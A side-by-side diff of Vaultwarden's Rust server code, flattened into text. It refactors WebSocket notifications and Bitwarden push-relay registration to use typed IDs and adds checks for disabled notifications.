if CONFIG.enable_websocket() {
|
||||||
|
self.send_update(&user.uuid, &data).await;
|
||||||
|
}
|
||||||
|
|
||||||
if CONFIG.push_enabled() {
|
if CONFIG.push_enabled() {
|
||||||
push_logout(user, acting_device_uuid);
|
push_logout(user, acting_device_id.clone(), conn).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn send_folder_update(
|
pub async fn send_folder_update(&self, ut: UpdateType, folder: &Folder, device: &Device, conn: &mut DbConn) {
|
||||||
&self,
|
// Skip any processing if both WebSockets and Push are not active
|
||||||
ut: UpdateType,
|
if *NOTIFICATIONS_DISABLED {
|
||||||
folder: &Folder,
|
return;
|
||||||
acting_device_uuid: &String,
|
}
|
||||||
conn: &mut DbConn,
|
|
||||||
) {
|
|
||||||
let data = create_update(
|
let data = create_update(
|
||||||
vec![
|
vec![
|
||||||
("Id".into(), folder.uuid.clone().into()),
|
("Id".into(), folder.uuid.to_string().into()),
|
||||||
("UserId".into(), folder.user_uuid.clone().into()),
|
("UserId".into(), folder.user_uuid.to_string().into()),
|
||||||
("RevisionDate".into(), serialize_date(folder.updated_at)),
|
("RevisionDate".into(), serialize_date(folder.updated_at)),
|
||||||
],
|
],
|
||||||
ut,
|
ut,
|
||||||
Some(acting_device_uuid.into()),
|
Some(device.uuid.clone()),
|
||||||
);
|
);
|
||||||
|
|
||||||
self.send_update(&folder.user_uuid, &data).await;
|
if CONFIG.enable_websocket() {
|
||||||
|
self.send_update(&folder.user_uuid, &data).await;
|
||||||
|
}
|
||||||
|
|
||||||
if CONFIG.push_enabled() {
|
if CONFIG.push_enabled() {
|
||||||
push_folder_update(ut, folder, acting_device_uuid, conn).await;
|
push_folder_update(ut, folder, device, conn).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -404,42 +407,48 @@ impl WebSocketUsers {
|
|||||||
&self,
|
&self,
|
||||||
ut: UpdateType,
|
ut: UpdateType,
|
||||||
cipher: &Cipher,
|
cipher: &Cipher,
|
||||||
user_uuids: &[String],
|
user_ids: &[UserId],
|
||||||
acting_device_uuid: &String,
|
device: &Device,
|
||||||
collection_uuids: Option<Vec<String>>,
|
collection_uuids: Option<Vec<CollectionId>>,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) {
|
) {
|
||||||
let org_uuid = convert_option(cipher.organization_uuid.clone());
|
// Skip any processing if both WebSockets and Push are not active
|
||||||
|
if *NOTIFICATIONS_DISABLED {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
let org_id = convert_option(cipher.organization_uuid.as_deref());
|
||||||
// Depending if there are collections provided or not, we need to have different values for the following variables.
|
// Depending if there are collections provided or not, we need to have different values for the following variables.
|
||||||
// The user_uuid should be `null`, and the revision date should be set to now, else the clients won't sync the collection change.
|
// The user_uuid should be `null`, and the revision date should be set to now, else the clients won't sync the collection change.
|
||||||
let (user_uuid, collection_uuids, revision_date) = if let Some(collection_uuids) = collection_uuids {
|
let (user_id, collection_uuids, revision_date) = if let Some(collection_uuids) = collection_uuids {
|
||||||
(
|
(
|
||||||
Value::Nil,
|
Value::Nil,
|
||||||
Value::Array(collection_uuids.into_iter().map(|v| v.into()).collect::<Vec<rmpv::Value>>()),
|
Value::Array(collection_uuids.into_iter().map(|v| v.to_string().into()).collect::<Vec<Value>>()),
|
||||||
serialize_date(Utc::now().naive_utc()),
|
serialize_date(Utc::now().naive_utc()),
|
||||||
)
|
)
|
||||||
} else {
|
} else {
|
||||||
(convert_option(cipher.user_uuid.clone()), Value::Nil, serialize_date(cipher.updated_at))
|
(convert_option(cipher.user_uuid.as_deref()), Value::Nil, serialize_date(cipher.updated_at))
|
||||||
};
|
};
|
||||||
|
|
||||||
let data = create_update(
|
let data = create_update(
|
||||||
vec![
|
vec![
|
||||||
("Id".into(), cipher.uuid.clone().into()),
|
("Id".into(), cipher.uuid.to_string().into()),
|
||||||
("UserId".into(), user_uuid),
|
("UserId".into(), user_id),
|
||||||
("OrganizationId".into(), org_uuid),
|
("OrganizationId".into(), org_id),
|
||||||
("CollectionIds".into(), collection_uuids),
|
("CollectionIds".into(), collection_uuids),
|
||||||
("RevisionDate".into(), revision_date),
|
("RevisionDate".into(), revision_date),
|
||||||
],
|
],
|
||||||
ut,
|
ut,
|
||||||
Some(acting_device_uuid.into()),
|
Some(device.uuid.clone()), // Acting device id (unique device/app uuid)
|
||||||
);
|
);
|
||||||
|
|
||||||
for uuid in user_uuids {
|
if CONFIG.enable_websocket() {
|
||||||
self.send_update(uuid, &data).await;
|
for uuid in user_ids {
|
||||||
|
self.send_update(uuid, &data).await;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
if CONFIG.push_enabled() && user_uuids.len() == 1 {
|
if CONFIG.push_enabled() && user_ids.len() == 1 {
|
||||||
push_cipher_update(ut, cipher, acting_device_uuid, conn).await;
|
push_cipher_update(ut, cipher, device, conn).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -447,66 +456,83 @@ impl WebSocketUsers {
|
|||||||
&self,
|
&self,
|
||||||
ut: UpdateType,
|
ut: UpdateType,
|
||||||
send: &DbSend,
|
send: &DbSend,
|
||||||
user_uuids: &[String],
|
user_ids: &[UserId],
|
||||||
acting_device_uuid: &String,
|
device: &Device,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) {
|
) {
|
||||||
let user_uuid = convert_option(send.user_uuid.clone());
|
// Skip any processing if both WebSockets and Push are not active
|
||||||
|
if *NOTIFICATIONS_DISABLED {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
let user_id = convert_option(send.user_uuid.as_deref());
|
||||||
|
|
||||||
let data = create_update(
|
let data = create_update(
|
||||||
vec![
|
vec![
|
||||||
("Id".into(), send.uuid.clone().into()),
|
("Id".into(), send.uuid.to_string().into()),
|
||||||
("UserId".into(), user_uuid),
|
("UserId".into(), user_id),
|
||||||
("RevisionDate".into(), serialize_date(send.revision_date)),
|
("RevisionDate".into(), serialize_date(send.revision_date)),
|
||||||
],
|
],
|
||||||
ut,
|
ut,
|
||||||
None,
|
None,
|
||||||
);
|
);
|
||||||
|
|
||||||
for uuid in user_uuids {
|
if CONFIG.enable_websocket() {
|
||||||
self.send_update(uuid, &data).await;
|
for uuid in user_ids {
|
||||||
|
self.send_update(uuid, &data).await;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
if CONFIG.push_enabled() && user_uuids.len() == 1 {
|
if CONFIG.push_enabled() && user_ids.len() == 1 {
|
||||||
push_send_update(ut, send, acting_device_uuid, conn).await;
|
push_send_update(ut, send, device, conn).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn send_auth_request(
|
pub async fn send_auth_request(
|
||||||
&self,
|
&self,
|
||||||
user_uuid: &String,
|
user_id: &UserId,
|
||||||
auth_request_uuid: &String,
|
auth_request_uuid: &str,
|
||||||
acting_device_uuid: &String,
|
device: &Device,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) {
|
) {
|
||||||
|
// Skip any processing if both WebSockets and Push are not active
|
||||||
|
if *NOTIFICATIONS_DISABLED {
|
||||||
|
return;
|
||||||
|
}
|
||||||
let data = create_update(
|
let data = create_update(
|
||||||
vec![("Id".into(), auth_request_uuid.clone().into()), ("UserId".into(), user_uuid.clone().into())],
|
vec![("Id".into(), auth_request_uuid.to_owned().into()), ("UserId".into(), user_id.to_string().into())],
|
||||||
UpdateType::AuthRequest,
|
UpdateType::AuthRequest,
|
||||||
Some(acting_device_uuid.to_string()),
|
Some(device.uuid.clone()),
|
||||||
);
|
);
|
||||||
self.send_update(user_uuid, &data).await;
|
if CONFIG.enable_websocket() {
|
||||||
|
self.send_update(user_id, &data).await;
|
||||||
|
}
|
||||||
|
|
||||||
if CONFIG.push_enabled() {
|
if CONFIG.push_enabled() {
|
||||||
push_auth_request(user_uuid.to_string(), auth_request_uuid.to_string(), conn).await;
|
push_auth_request(user_id, auth_request_uuid, device, conn).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn send_auth_response(
|
pub async fn send_auth_response(
|
||||||
&self,
|
&self,
|
||||||
user_uuid: &String,
|
user_id: &UserId,
|
||||||
auth_response_uuid: &str,
|
auth_request_id: &AuthRequestId,
|
||||||
approving_device_uuid: String,
|
device: &Device,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) {
|
) {
|
||||||
|
// Skip any processing if both WebSockets and Push are not active
|
||||||
|
if *NOTIFICATIONS_DISABLED {
|
||||||
|
return;
|
||||||
|
}
|
||||||
let data = create_update(
|
let data = create_update(
|
||||||
vec![("Id".into(), auth_response_uuid.to_owned().into()), ("UserId".into(), user_uuid.clone().into())],
|
vec![("Id".into(), auth_request_id.to_string().into()), ("UserId".into(), user_id.to_string().into())],
|
||||||
UpdateType::AuthRequestResponse,
|
UpdateType::AuthRequestResponse,
|
||||||
approving_device_uuid.clone().into(),
|
Some(device.uuid.clone()),
|
||||||
);
|
);
|
||||||
self.send_update(auth_response_uuid, &data).await;
|
if CONFIG.enable_websocket() {
|
||||||
|
self.send_update(user_id, &data).await;
|
||||||
|
}
|
||||||
|
|
||||||
if CONFIG.push_enabled() {
|
if CONFIG.push_enabled() {
|
||||||
push_auth_response(user_uuid.to_string(), auth_response_uuid.to_string(), approving_device_uuid, conn)
|
push_auth_response(user_id, auth_request_id, device, conn).await;
|
||||||
.await;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -525,13 +551,16 @@ impl AnonymousWebSocketSubscriptions {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn send_auth_response(&self, user_uuid: &String, auth_response_uuid: &str) {
|
pub async fn send_auth_response(&self, user_id: &UserId, auth_request_id: &AuthRequestId) {
|
||||||
|
if !CONFIG.enable_websocket() {
|
||||||
|
return;
|
||||||
|
}
|
||||||
let data = create_anonymous_update(
|
let data = create_anonymous_update(
|
||||||
vec![("Id".into(), auth_response_uuid.to_owned().into()), ("UserId".into(), user_uuid.clone().into())],
|
vec![("Id".into(), auth_request_id.to_string().into()), ("UserId".into(), user_id.to_string().into())],
|
||||||
UpdateType::AuthRequestResponse,
|
UpdateType::AuthRequestResponse,
|
||||||
user_uuid.to_string(),
|
user_id.clone(),
|
||||||
);
|
);
|
||||||
self.send_update(auth_response_uuid, &data).await;
|
self.send_update(auth_request_id, &data).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -543,14 +572,14 @@ impl AnonymousWebSocketSubscriptions {
|
|||||||
"ReceiveMessage", // Target
|
"ReceiveMessage", // Target
|
||||||
[ // Arguments
|
[ // Arguments
|
||||||
{
|
{
|
||||||
"ContextId": acting_device_uuid || Nil,
|
"ContextId": acting_device_id || Nil,
|
||||||
"Type": ut as i32,
|
"Type": ut as i32,
|
||||||
"Payload": {}
|
"Payload": {}
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
]
|
]
|
||||||
*/
|
*/
|
||||||
fn create_update(payload: Vec<(Value, Value)>, ut: UpdateType, acting_device_uuid: Option<String>) -> Vec<u8> {
|
fn create_update(payload: Vec<(Value, Value)>, ut: UpdateType, acting_device_id: Option<DeviceId>) -> Vec<u8> {
|
||||||
use rmpv::Value as V;
|
use rmpv::Value as V;
|
||||||
|
|
||||||
let value = V::Array(vec![
|
let value = V::Array(vec![
|
||||||
@@ -559,7 +588,7 @@ fn create_update(payload: Vec<(Value, Value)>, ut: UpdateType, acting_device_uui
|
|||||||
V::Nil,
|
V::Nil,
|
||||||
"ReceiveMessage".into(),
|
"ReceiveMessage".into(),
|
||||||
V::Array(vec![V::Map(vec![
|
V::Array(vec![V::Map(vec![
|
||||||
("ContextId".into(), acting_device_uuid.map(|v| v.into()).unwrap_or_else(|| V::Nil)),
|
("ContextId".into(), acting_device_id.map(|v| v.to_string().into()).unwrap_or_else(|| V::Nil)),
|
||||||
("Type".into(), (ut as i32).into()),
|
("Type".into(), (ut as i32).into()),
|
||||||
("Payload".into(), payload.into()),
|
("Payload".into(), payload.into()),
|
||||||
])]),
|
])]),
|
||||||
@@ -568,7 +597,7 @@ fn create_update(payload: Vec<(Value, Value)>, ut: UpdateType, acting_device_uui
|
|||||||
serialize(value)
|
serialize(value)
|
||||||
}
|
}
|
||||||
|
|
||||||
fn create_anonymous_update(payload: Vec<(Value, Value)>, ut: UpdateType, user_id: String) -> Vec<u8> {
|
fn create_anonymous_update(payload: Vec<(Value, Value)>, ut: UpdateType, user_id: UserId) -> Vec<u8> {
|
||||||
use rmpv::Value as V;
|
use rmpv::Value as V;
|
||||||
|
|
||||||
let value = V::Array(vec![
|
let value = V::Array(vec![
|
||||||
@@ -579,7 +608,7 @@ fn create_anonymous_update(payload: Vec<(Value, Value)>, ut: UpdateType, user_id
|
|||||||
V::Array(vec![V::Map(vec![
|
V::Array(vec![V::Map(vec![
|
||||||
("Type".into(), (ut as i32).into()),
|
("Type".into(), (ut as i32).into()),
|
||||||
("Payload".into(), payload.into()),
|
("Payload".into(), payload.into()),
|
||||||
("UserId".into(), user_id.into()),
|
("UserId".into(), user_id.to_string().into()),
|
||||||
])]),
|
])]),
|
||||||
]);
|
]);
|
||||||
|
|
||||||
@@ -620,127 +649,3 @@ pub enum UpdateType {
|
|||||||
|
|
||||||
pub type Notify<'a> = &'a rocket::State<Arc<WebSocketUsers>>;
|
pub type Notify<'a> = &'a rocket::State<Arc<WebSocketUsers>>;
|
||||||
pub type AnonymousNotify<'a> = &'a rocket::State<Arc<AnonymousWebSocketSubscriptions>>;
|
pub type AnonymousNotify<'a> = &'a rocket::State<Arc<AnonymousWebSocketSubscriptions>>;
|
||||||
|
|
||||||
pub fn start_notification_server() -> Arc<WebSocketUsers> {
|
|
||||||
let users = Arc::clone(&WS_USERS);
|
|
||||||
if CONFIG.websocket_enabled() {
|
|
||||||
let users2 = Arc::<WebSocketUsers>::clone(&users);
|
|
||||||
tokio::spawn(async move {
|
|
||||||
let addr = (CONFIG.websocket_address(), CONFIG.websocket_port());
|
|
||||||
info!("Starting WebSockets server on {}:{}", addr.0, addr.1);
|
|
||||||
let listener = TcpListener::bind(addr).await.expect("Can't listen on websocket port");
|
|
||||||
|
|
||||||
let (shutdown_tx, mut shutdown_rx) = tokio::sync::oneshot::channel::<()>();
|
|
||||||
CONFIG.set_ws_shutdown_handle(shutdown_tx);
|
|
||||||
|
|
||||||
loop {
|
|
||||||
tokio::select! {
|
|
||||||
Ok((stream, addr)) = listener.accept() => {
|
|
||||||
tokio::spawn(handle_connection(stream, Arc::<WebSocketUsers>::clone(&users2), addr));
|
|
||||||
}
|
|
||||||
|
|
||||||
_ = &mut shutdown_rx => {
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
info!("Shutting down WebSockets server!")
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
users
|
|
||||||
}
|
|
||||||
|
|
||||||
async fn handle_connection(stream: TcpStream, users: Arc<WebSocketUsers>, addr: SocketAddr) -> Result<(), Error> {
|
|
||||||
let mut user_uuid: Option<String> = None;
|
|
||||||
|
|
||||||
info!("Accepting WS connection from {addr}");
|
|
||||||
|
|
||||||
// Accept connection, do initial handshake, validate auth token and get the user ID
|
|
||||||
use handshake::server::{Request, Response};
|
|
||||||
let mut stream = accept_hdr_async(stream, |req: &Request, res: Response| {
|
|
||||||
if let Some(token) = get_request_token(req) {
|
|
||||||
if let Ok(claims) = crate::auth::decode_login(&token) {
|
|
||||||
user_uuid = Some(claims.sub);
|
|
||||||
return Ok(res);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
Err(Response::builder().status(401).body(None).unwrap())
|
|
||||||
})
|
|
||||||
.await?;
|
|
||||||
|
|
||||||
let user_uuid = user_uuid.expect("User UUID should be set after the handshake");
|
|
||||||
|
|
||||||
let (mut rx, guard) = {
|
|
||||||
// Add a channel to send messages to this client to the map
|
|
||||||
let entry_uuid = uuid::Uuid::new_v4();
|
|
||||||
let (tx, rx) = tokio::sync::mpsc::channel::<Message>(100);
|
|
||||||
users.map.entry(user_uuid.clone()).or_default().push((entry_uuid, tx));
|
|
||||||
|
|
||||||
// Once the guard goes out of scope, the connection will have been closed and the entry will be deleted from the map
|
|
||||||
(rx, WSEntryMapGuard::new(users, user_uuid, entry_uuid, addr.ip()))
|
|
||||||
};
|
|
||||||
|
|
||||||
let _guard = guard;
|
|
||||||
let mut interval = tokio::time::interval(Duration::from_secs(15));
|
|
||||||
loop {
|
|
||||||
tokio::select! {
|
|
||||||
res = stream.next() => {
|
|
||||||
match res {
|
|
||||||
Some(Ok(message)) => {
|
|
||||||
match message {
|
|
||||||
// Respond to any pings
|
|
||||||
Message::Ping(ping) => stream.send(Message::Pong(ping)).await?,
|
|
||||||
Message::Pong(_) => {/* Ignored */},
|
|
||||||
|
|
||||||
// We should receive an initial message with the protocol and version, and we will reply to it
|
|
||||||
Message::Text(ref message) => {
|
|
||||||
let msg = message.strip_suffix(RECORD_SEPARATOR as char).unwrap_or(message);
|
|
||||||
|
|
||||||
if serde_json::from_str(msg).ok() == Some(INITIAL_MESSAGE) {
|
|
||||||
stream.send(Message::binary(INITIAL_RESPONSE)).await?;
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
// Just echo anything else the client sends
|
|
||||||
_ => stream.send(message).await?,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
_ => break,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
res = rx.recv() => {
|
|
||||||
match res {
|
|
||||||
Some(res) => stream.send(res).await?,
|
|
||||||
None => break,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
_ = interval.tick() => stream.send(Message::Ping(create_ping())).await?
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
Ok(())
|
|
||||||
}
|
|
||||||
|
|
||||||
fn get_request_token(req: &handshake::server::Request) -> Option<String> {
|
|
||||||
const ACCESS_TOKEN_KEY: &str = "access_token=";
|
|
||||||
|
|
||||||
if let Some(Ok(auth)) = req.headers().get("Authorization").map(|a| a.to_str()) {
|
|
||||||
if let Some(token_part) = auth.strip_prefix("Bearer ") {
|
|
||||||
return Some(token_part.to_owned());
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
if let Some(params) = req.uri().query() {
|
|
||||||
let params_iter = params.split('&').take(1);
|
|
||||||
for val in params_iter {
|
|
||||||
if let Some(stripped) = val.strip_prefix(ACCESS_TOKEN_KEY) {
|
|
||||||
return Some(stripped.to_owned());
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
None
|
|
||||||
}
|
|
||||||
|
|||||||
293
src/api/push.rs
293
src/api/push.rs
@@ -1,11 +1,15 @@
|
|||||||
use reqwest::header::{ACCEPT, AUTHORIZATION, CONTENT_TYPE};
|
use reqwest::{
|
||||||
|
header::{ACCEPT, AUTHORIZATION, CONTENT_TYPE},
|
||||||
|
Method,
|
||||||
|
};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
use tokio::sync::RwLock;
|
use tokio::sync::RwLock;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{ApiResult, EmptyResult, UpdateType},
|
api::{ApiResult, EmptyResult, UpdateType},
|
||||||
db::models::{Cipher, Device, Folder, Send, User},
|
db::models::{AuthRequestId, Cipher, Device, DeviceId, Folder, PushId, Send, User, UserId},
|
||||||
util::get_reqwest_client,
|
http_client::make_http_request,
|
||||||
|
util::{format_date, get_uuid},
|
||||||
CONFIG,
|
CONFIG,
|
||||||
};
|
};
|
||||||
|
|
||||||
@@ -24,20 +28,20 @@ struct LocalAuthPushToken {
|
|||||||
valid_until: Instant,
|
valid_until: Instant,
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn get_auth_push_token() -> ApiResult<String> {
|
async fn get_auth_api_token() -> ApiResult<String> {
|
||||||
static PUSH_TOKEN: Lazy<RwLock<LocalAuthPushToken>> = Lazy::new(|| {
|
static API_TOKEN: Lazy<RwLock<LocalAuthPushToken>> = Lazy::new(|| {
|
||||||
RwLock::new(LocalAuthPushToken {
|
RwLock::new(LocalAuthPushToken {
|
||||||
access_token: String::new(),
|
access_token: String::new(),
|
||||||
valid_until: Instant::now(),
|
valid_until: Instant::now(),
|
||||||
})
|
})
|
||||||
});
|
});
|
||||||
let push_token = PUSH_TOKEN.read().await;
|
let api_token = API_TOKEN.read().await;
|
||||||
|
|
||||||
if push_token.valid_until.saturating_duration_since(Instant::now()).as_secs() > 0 {
|
if api_token.valid_until.saturating_duration_since(Instant::now()).as_secs() > 0 {
|
||||||
debug!("Auth Push token still valid, no need for a new one");
|
debug!("Auth Push token still valid, no need for a new one");
|
||||||
return Ok(push_token.access_token.clone());
|
return Ok(api_token.access_token.clone());
|
||||||
}
|
}
|
||||||
drop(push_token); // Drop the read lock now
|
drop(api_token); // Drop the read lock now
|
||||||
|
|
||||||
let installation_id = CONFIG.push_installation_id();
|
let installation_id = CONFIG.push_installation_id();
|
||||||
let client_id = format!("installation.{installation_id}");
|
let client_id = format!("installation.{installation_id}");
|
||||||
@@ -50,8 +54,7 @@ async fn get_auth_push_token() -> ApiResult<String> {
|
|||||||
("client_secret", &client_secret),
|
("client_secret", &client_secret),
|
||||||
];
|
];
|
||||||
|
|
||||||
let res = match get_reqwest_client()
|
let res = match make_http_request(Method::POST, &format!("{}/connect/token", CONFIG.push_identity_uri()))?
|
||||||
.post(&format!("{}/connect/token", CONFIG.push_identity_uri()))
|
|
||||||
.form(¶ms)
|
.form(¶ms)
|
||||||
.send()
|
.send()
|
||||||
.await
|
.await
|
||||||
@@ -65,47 +68,50 @@ async fn get_auth_push_token() -> ApiResult<String> {
|
|||||||
Err(e) => err!(format!("Unexpected push token received from bitwarden server: {e}")),
|
Err(e) => err!(format!("Unexpected push token received from bitwarden server: {e}")),
|
||||||
};
|
};
|
||||||
|
|
||||||
let mut push_token = PUSH_TOKEN.write().await;
|
let mut api_token = API_TOKEN.write().await;
|
||||||
push_token.valid_until = Instant::now()
|
api_token.valid_until = Instant::now()
|
||||||
.checked_add(Duration::new((json_pushtoken.expires_in / 2) as u64, 0)) // Token valid for half the specified time
|
.checked_add(Duration::new((json_pushtoken.expires_in / 2) as u64, 0)) // Token valid for half the specified time
|
||||||
.unwrap();
|
.unwrap();
|
||||||
|
|
||||||
push_token.access_token = json_pushtoken.access_token;
|
api_token.access_token = json_pushtoken.access_token;
|
||||||
|
|
||||||
debug!("Token still valid for {}", push_token.valid_until.saturating_duration_since(Instant::now()).as_secs());
|
debug!("Token still valid for {}", api_token.valid_until.saturating_duration_since(Instant::now()).as_secs());
|
||||||
Ok(push_token.access_token.clone())
|
Ok(api_token.access_token.clone())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn register_push_device(device: &mut Device, conn: &mut crate::db::DbConn) -> EmptyResult {
|
pub async fn register_push_device(device: &mut Device, conn: &mut crate::db::DbConn) -> EmptyResult {
|
||||||
if !CONFIG.push_enabled() || !device.is_push_device() || device.is_registered() {
|
if !CONFIG.push_enabled() || !device.is_push_device() {
|
||||||
return Ok(());
|
return Ok(());
|
||||||
}
|
}
|
||||||
|
|
||||||
if device.push_token.is_none() {
|
if device.push_token.is_none() {
|
||||||
warn!("Skipping the registration of the device {} because the push_token field is empty.", device.uuid);
|
warn!("Skipping the registration of the device {:?} because the push_token field is empty.", device.uuid);
|
||||||
warn!("To get rid of this message you need to clear the app data and reconnect the device.");
|
warn!("To get rid of this message you need to logout, clear the app data and login again on the device.");
|
||||||
return Ok(());
|
return Ok(());
|
||||||
}
|
}
|
||||||
|
|
||||||
debug!("Registering Device {}", device.uuid);
|
debug!("Registering Device {:?}", device.push_uuid);
|
||||||
|
|
||||||
// generate a random push_uuid so we know the device is registered
|
// Generate a random push_uuid so if it doesn't already have one
|
||||||
device.push_uuid = Some(uuid::Uuid::new_v4().to_string());
|
if device.push_uuid.is_none() {
|
||||||
|
device.push_uuid = Some(PushId(get_uuid()));
|
||||||
|
}
|
||||||
|
|
||||||
//Needed to register a device for push to bitwarden :
|
//Needed to register a device for push to bitwarden :
|
||||||
let data = json!({
|
let data = json!({
|
||||||
|
"deviceId": device.push_uuid, // Unique UUID per user/device
|
||||||
|
"pushToken": device.push_token,
|
||||||
"userId": device.user_uuid,
|
"userId": device.user_uuid,
|
||||||
"deviceId": device.push_uuid,
|
|
||||||
"identifier": device.uuid,
|
|
||||||
"type": device.atype,
|
"type": device.atype,
|
||||||
"pushToken": device.push_token
|
"identifier": device.uuid, // Unique UUID of the device/app, determined by the device/app it self currently registering
|
||||||
|
// "organizationIds:" [] // TODO: This is not yet implemented by Vaultwarden!
|
||||||
|
"installationId": CONFIG.push_installation_id(),
|
||||||
});
|
});
|
||||||
|
|
||||||
let auth_push_token = get_auth_push_token().await?;
|
let auth_api_token = get_auth_api_token().await?;
|
||||||
let auth_header = format!("Bearer {}", &auth_push_token);
|
let auth_header = format!("Bearer {auth_api_token}");
|
||||||
|
|
||||||
if let Err(e) = get_reqwest_client()
|
if let Err(e) = make_http_request(Method::POST, &(CONFIG.push_relay_uri() + "/push/register"))?
|
||||||
.post(CONFIG.push_relay_uri() + "/push/register")
|
|
||||||
.header(CONTENT_TYPE, "application/json")
|
.header(CONTENT_TYPE, "application/json")
|
||||||
.header(ACCEPT, "application/json")
|
.header(ACCEPT, "application/json")
|
||||||
.header(AUTHORIZATION, auth_header)
|
.header(AUTHORIZATION, auth_header)
|
||||||
@@ -114,29 +120,31 @@ pub async fn register_push_device(device: &mut Device, conn: &mut crate::db::DbC
|
|||||||
.await?
|
.await?
|
||||||
.error_for_status()
|
.error_for_status()
|
||||||
{
|
{
|
||||||
err!(format!("An error occured while proceeding registration of a device: {e}"));
|
err!(format!("An error occurred while proceeding registration of a device: {e}"));
|
||||||
}
|
}
|
||||||
|
|
||||||
if let Err(e) = device.save(conn).await {
|
if let Err(e) = device.save(conn).await {
|
||||||
err!(format!("An error occured while trying to save the (registered) device push uuid: {e}"));
|
err!(format!("An error occurred while trying to save the (registered) device push uuid: {e}"));
|
||||||
}
|
}
|
||||||
|
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn unregister_push_device(push_uuid: Option<String>) -> EmptyResult {
|
pub async fn unregister_push_device(push_id: &Option<PushId>) -> EmptyResult {
|
||||||
if !CONFIG.push_enabled() || push_uuid.is_none() {
|
if !CONFIG.push_enabled() || push_id.is_none() {
|
||||||
return Ok(());
|
return Ok(());
|
||||||
}
|
}
|
||||||
let auth_push_token = get_auth_push_token().await?;
|
let auth_api_token = get_auth_api_token().await?;
|
||||||
|
|
||||||
let auth_header = format!("Bearer {}", &auth_push_token);
|
let auth_header = format!("Bearer {auth_api_token}");
|
||||||
|
|
||||||
match get_reqwest_client()
|
match make_http_request(
|
||||||
.delete(CONFIG.push_relay_uri() + "/push/" + &push_uuid.unwrap())
|
Method::POST,
|
||||||
.header(AUTHORIZATION, auth_header)
|
&format!("{}/push/delete/{}", CONFIG.push_relay_uri(), push_id.as_ref().unwrap()),
|
||||||
.send()
|
)?
|
||||||
.await
|
.header(AUTHORIZATION, auth_header)
|
||||||
|
.send()
|
||||||
|
.await
|
||||||
{
|
{
|
||||||
Ok(r) => r,
|
Ok(r) => r,
|
||||||
Err(e) => err!(format!("An error occurred during device unregistration: {e}")),
|
Err(e) => err!(format!("An error occurred during device unregistration: {e}")),
|
||||||
@@ -144,108 +152,110 @@ pub async fn unregister_push_device(push_uuid: Option<String>) -> EmptyResult {
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn push_cipher_update(
|
pub async fn push_cipher_update(ut: UpdateType, cipher: &Cipher, device: &Device, conn: &mut crate::db::DbConn) {
|
||||||
ut: UpdateType,
|
|
||||||
cipher: &Cipher,
|
|
||||||
acting_device_uuid: &String,
|
|
||||||
conn: &mut crate::db::DbConn,
|
|
||||||
) {
|
|
||||||
// We shouldn't send a push notification on cipher update if the cipher belongs to an organization, this isn't implemented in the upstream server too.
|
// We shouldn't send a push notification on cipher update if the cipher belongs to an organization, this isn't implemented in the upstream server too.
|
||||||
if cipher.organization_uuid.is_some() {
|
if cipher.organization_uuid.is_some() {
|
||||||
return;
|
return;
|
||||||
};
|
};
|
||||||
let user_uuid = match &cipher.user_uuid {
|
let Some(user_id) = &cipher.user_uuid else {
|
||||||
Some(c) => c,
|
debug!("Cipher has no uuid");
|
||||||
None => {
|
return;
|
||||||
debug!("Cipher has no uuid");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if Device::check_user_has_push_device(user_uuid, conn).await {
|
if Device::check_user_has_push_device(user_id, conn).await {
|
||||||
send_to_push_relay(json!({
|
send_to_push_relay(json!({
|
||||||
"userId": user_uuid,
|
"userId": user_id,
|
||||||
"organizationId": (),
|
"organizationId": null,
|
||||||
"deviceId": acting_device_uuid,
|
"deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
|
||||||
"identifier": acting_device_uuid,
|
"identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
|
||||||
"type": ut as i32,
|
"type": ut as i32,
|
||||||
"payload": {
|
"payload": {
|
||||||
"id": cipher.uuid,
|
"id": cipher.uuid,
|
||||||
"userId": cipher.user_uuid,
|
"userId": cipher.user_uuid,
|
||||||
"organizationId": (),
|
"organizationId": null,
|
||||||
"revisionDate": cipher.updated_at
|
"collectionIds": null,
|
||||||
}
|
